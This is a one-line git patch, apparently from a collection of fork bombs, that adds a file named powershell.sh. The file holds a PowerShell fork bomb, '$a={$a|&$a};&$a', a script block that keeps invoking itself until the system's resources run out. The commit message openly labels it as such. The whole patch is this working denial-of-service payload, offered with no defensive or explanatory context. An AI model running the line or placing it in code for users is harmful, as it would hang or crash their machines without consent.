From 71086a50814cf2cec1552cd120f329eb02f45cbe Mon Sep 17 00:00:00 2001 From: Mackan Date: Thu, 1 Oct 2020 16:20:10 +0200 Subject: [PATCH] Create a forkbomb in powershell. --- powershell.sh | 1 + 1 file changed, 1 insertion(+) create mode 100644 powershell.sh diff --git a/powershell.sh b/powershell.sh new file mode 100644 index 0000000..66e67e6 --- /dev/null +++ b/powershell.sh @@ -0,0 +1 @@ +$a={$a|&$a};&$a